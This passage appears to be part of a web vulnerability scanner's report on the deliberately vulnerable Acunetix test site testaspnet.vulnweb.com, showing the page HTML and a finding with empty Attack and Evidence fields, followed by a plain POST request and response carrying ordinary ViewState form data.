value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L/R3K+NgG4eTH6G64d5v" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKblqunCgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEMuJR47/37fBoWsDm+8pRHDKDZX" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	POST
Parameter	__VIEWSTATEGENERATOR
Attack
Evidence
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 Content-Length: 3707 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,707 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwK30rH2AgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE1qoi%2FTB7mR4IysbuEg0lOgmHIs
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18011
Response Body - size: 18,011 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXgg